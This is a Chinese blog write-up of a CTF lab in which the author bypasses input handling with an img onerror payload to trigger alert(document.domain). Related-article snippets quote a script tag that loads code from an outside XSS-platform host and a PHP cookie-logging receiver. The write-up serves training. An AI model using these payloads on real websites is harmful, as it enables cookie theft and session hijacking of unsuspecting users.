CTF | 试试XSS

最新推荐文章于 2024-10-17 09:56:38 发布
最新推荐文章于 2024-10-17 09:56:38 发布
阅读量2k 收藏
点赞数
分类专栏: CTF-Web实验 CTF-Web实验 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42646885/article/details/95175639
版权

进入合天网安实验室的实验机,打开网址只显示一个输入框,并提示alert document.domain。

尝试在在输入框输入<script>alert(document.domain)</script>

提交以后页面页面刷新了。再尝试输入<、>,’,"符号。发现在输入'和''时,页面多出了一个Img标签。

当输入'zzzzz时,zzzzz成了img标签的一个属性名。

想到了onerror,尝试下输入提示:'οnerrοr=alert(document.domain)

结果没有弹出来。查看源码没有发现被编码。

在多次尝试后发现,’前面的内容为src中的内容,'后面的内容为自定义属性及其内容。

尝试在‘前面加一个随便的路径试下。

执行后

发现弹出了域名信息的,还有出现了flag信息。

总结:该实验相对比较简单,只要发现了引号'出现的img标签,及标签内的值有输入框确定,再加上很明显的提示就可以解决。另外在本实验开始的时候输入最后代码只弹出域名信息却不显示flag信息,查看源代码和对比指导书都没问题,后来发现在'后面要打一个空格,好心累,以后还是对代码书写要严谨些。

 

 

大青呐
关注
专栏目录
ctf-browser-visitor:Bot访客服务,应对CTF中的XSS挑战
05-04
ctf浏览器访问者 Bot访问者应对CTF中的XSS挑战 http://127.0.0.1:5000/visit?job={"url":"url_to_visit","cookies":{"key":"value"}}
了解一些xss漏洞绕过方式
贝隆的博客
02-05 1888
了解一些xss漏洞绕过方式
CTFHub-Web-反射型XSS
qq_54037445的博客
11-28 614
CTFHub-Web-反射型XSS XSS平台
CTF(四)
最新发布
2302_80280669的博客
10-17 948
本文主要讲述在CTF竞赛中,web类SQL注入题目file_include。
XSS绕过(弹窗拿flag
qq_48550824的博客
08-05 696
XSS简介及绕过方法介绍
XSS漏洞
hintll的博客
09-12 447
XSS漏洞 XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS攻击的危害包括 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力 3、盗窃企业重要的具有商业价值的资料 4、非法转账 5、强制发送电子邮件 6、网站挂马 7、控
ctfshow web入门 xss
blowed的博客
01-01 727
xss
利用xss平台的payload输入留言即可获得flag
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-26 1812
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top:利用xss平台的payload输入留言即可获得flag categories: CTFHUB刷题 tags:利用xss平台的payload输入留言即可获得flag 网络安全,CTFHUB,CTFHUB------XSS 反射型xss题目 题目是xss反射型 xss反射型是将变量的值换成xss的payload flag在cookie中,利用xss平台进行获取flag 利用xss平台的payload输入留言
ctf xss注入.pdf
02-11
根据题目描述:“ctf xss注入”,我们将具体分析一个XSS注入的实际案例,并探讨如何利用XSS进行攻击。 ##### 1. 比较耍赖的方法 题目给出的网址为`http://206.189.214.99:4080/xss/`。首先,通过打开该网址,可以...
XSSPawn:XSSPawn是一种灵活且可自定义的访客bot,用于设置CTF挑战; 主要用作CTF XSS Bot。 它基于CTFTraining的base_image_xssbot
04-08
XSSPawn XSSPawn是一种灵活且可自定义的访客bot,用于CTF(主要是XSS)挑战设置。 从精湛的分支建于高山的Chrome木偶核心Express.js怎么运行的XSSPawn是基于触发器的,由Express驱动的服务,它依赖于HTTP请求通信。 ...
ctf:CTF评论|网络
04-19
周大福CTF评论|网络
xss注入讲解ppt.pptx
08-10
其中,反射型 xss 是现在最容易出现的一种 xss 漏洞,当用户访问一个带有 xss 代码的 url 请求时,服务器端接收数据后处理,然后把带有 xss 代码的数据发送到浏览器,浏览器解析这段带有 xss 代码的数据后,最终造成...
【安全】P 4-1 XSS跨站脚本分类
Z_David_Z的博客
02-17 396
目录0X01 XSS漏洞介绍0X02 反射型XSS0X03 存储型XSS0X04 DOM型XSS 0X01 XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 0X02 反射型XSS 反射型XSS又称非持久性XSS,这种攻击
CTFshow web入门 web316-web333 XSS
qq_56815564的博客
07-05 2189
我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码。
CTFer成长之路之XSS的魔力
梦里明明有六趣,觉后空空无大千
02-24 744
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
题解记录-CTFHub技能树|Web|XSS,文件上传
weixin_57448435的博客
09-15 1041
xss平台使用,修改后缀名、文件头、双写绕过,%00截断,.htaccess文件理解,bp与蚁剑工具的使用
ctfhub-技能树-xss题集全部习题详解-最新
weixin_73562787的博客
08-10 4271
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag
webug--XSS
gclome的博客
06-03 1061
9 反射型xss 将1换成<script>alert('xss')</script>,成功弹框! 可是怎么找flag呢? 猜测在cookie文件里,于是使用<script>alert(document.cookie)</script> 弹出flag! 10 存储型xss 这一关有点鸡肋,访问进去,找到留言框,输入<script>alert(xss)</script>,就把这两关的flag全部弹了出来 12 DOM型xss 访问链接,先输
ctfshow XSS刷题总结
qq_53755216的博客
07-21 1099
简介 这次把爪牙伸到了xss 嘿嘿嘿 开始日咯! web316 用xss平台怎么也爆不出。。。 可能是姿势不对 用最原始的方法吧 在自己的服务器上写一个hack.php <?php $content = $_GET[1]; if(isset($content)){ file_put_contents('XSS/flag.txt',$content); }else{ echo 'no date input'; } 下边拿到后直接把cookie转发 <script>docum
ctf中的xss攻击
10-20
CTF比赛中,XSS攻击是一种常见的攻击方式。攻击者通过在网站中注入恶意脚本代码,使得其他用户在访问该网站时受到攻击。攻击者可以通过XSS攻击窃取用户的敏感信息,如cookie、密码等,或者进行其他恶意操作。在CTF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值